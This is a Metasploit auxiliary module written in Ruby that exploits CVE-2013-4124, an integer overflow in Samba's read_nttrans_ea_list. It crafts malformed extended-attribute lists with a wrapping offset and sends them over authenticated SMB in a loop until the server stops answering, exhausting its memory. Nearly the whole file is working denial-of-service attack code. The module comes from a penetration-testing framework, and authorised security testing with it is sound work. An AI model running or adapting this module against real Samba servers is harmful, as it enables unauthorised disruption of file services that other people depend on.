modules/auxiliary/dos/samba/read_nttrans_ea_list.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/struct2'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client::Authenticated
TRANS2_PARAM = Rex::Struct2::CStructTemplate.new(
[ 'uint16v', 'FID', 0 ],
[ 'uint16v', 'InfoLevel', 0 ],
[ 'uint16v', 'Reserved', 0 ],
)
FEA_LIST = Rex::Struct2::CStructTemplate.new(
[ 'uint32v', 'NextOffset', 0 ],
[ 'uint8', 'Flags', 0 ],
[ 'uint8', 'NameLen', 0 ],
[ 'uint16v', 'ValueLen', 0 ],
[ 'string', 'Name', nil, '' ],
[ 'string', 'Value', nil, '' ]
)
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba read_nttrans_ea_list Integer Overflow',
'Description' => %q{
Integer overflow in the read_nttrans_ea_list function in nttrans.c in
smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before
4.0.8 allows remote attackers to cause a denial of service (memory
consumption) via a malformed packet. Important Note: in order to work,
the "ea support" option on the target share must be enabled.
},
'Author' =>
[
'Jeremy Allison', # Vulnerability discovery
'dz_lnly' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '95969'],
['BID', '61597'],
['EDB', '27778'],
['CVE', '2013-4124']
],
))
register_options(
[
OptString.new('SMBShare', [true, 'Target share', '']),
OptInt.new('MsgLen', [true, 'How soon a memory get exhausted depends on the length of that attribute', 1500]),
OptInt.new('Tries', [true, 'Number of DOS tries', 40]),
])
deregister_options('SMB::ProtocolVersion')
end
def get_fid
ok = self.simple.client.create("/")
return ok['Payload'].v['FileID']
end
def mk_items_payload
item1 = FEA_LIST.make_struct
item1.v['ValueLen'] = datastore['MsgLen']
item1.v['Value'] = "\x00" * datastore['MsgLen']
item1.v['Name'] = Rex::Text.rand_text_alpha(5 + rand(3)) + "\x00"
item1.v['NameLen'] = item1.v['Name'].length
item2 = FEA_LIST.make_struct
item2.v['ValueLen'] = datastore['MsgLen']
item2.v['Value'] = "\x00" * datastore['MsgLen']
item2.v['Name'] = Rex::Text.rand_text_alpha(5 + rand(3)) + "\x00"
item2.v['NameLen'] = item1.v['Name'].length
item3 = FEA_LIST.make_struct # Some padding
item3.v['ValueLen'] = 4
item3.v['Value'] = "\x00\x00\x00\x00"
item3.v['Name'] = Rex::Text.rand_text_alpha(5 + rand(3)) + "\x00"
item3.v['NameLen'] = item1.v['Name'].length
ilen = item1.to_s.length
item1.v['NextOffset'] = ilen
# Wrap offset to 0x00
item2.v['NextOffset'] = 0xffffffff - ilen + 1
return item1.to_s + item2.to_s + item3.to_s
end
def send_pkt
fid = get_fid
trans = TRANS2_PARAM.make_struct
trans.v['FID'] = fid
trans.v['InfoLevel'] = 1015 # SMB_FILE_FULL_EA_INFORMATION
data = mk_items_payload
subcmd = 0x08
self.simple.client.trans2(subcmd, trans.to_s, data.to_s, false)
end
def run
print_status("Trying a max of #{datastore['Tries']} times...")
datastore['Tries'].times do
connect(versions: [1])
smb_login()
self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")
print_status('Sending malicious package...')
send_pkt
begin
self.simple.client.create("")
print_error('Server Answered, DoS unsuccessful')
rescue Timeout::Error
print_good('Server timed out, this is expected')
return
rescue Rex::Proto::SMB::Exceptions::InvalidType
print_error('Server Answered, DoS unsuccessful')
end
disconnect()
end
end
end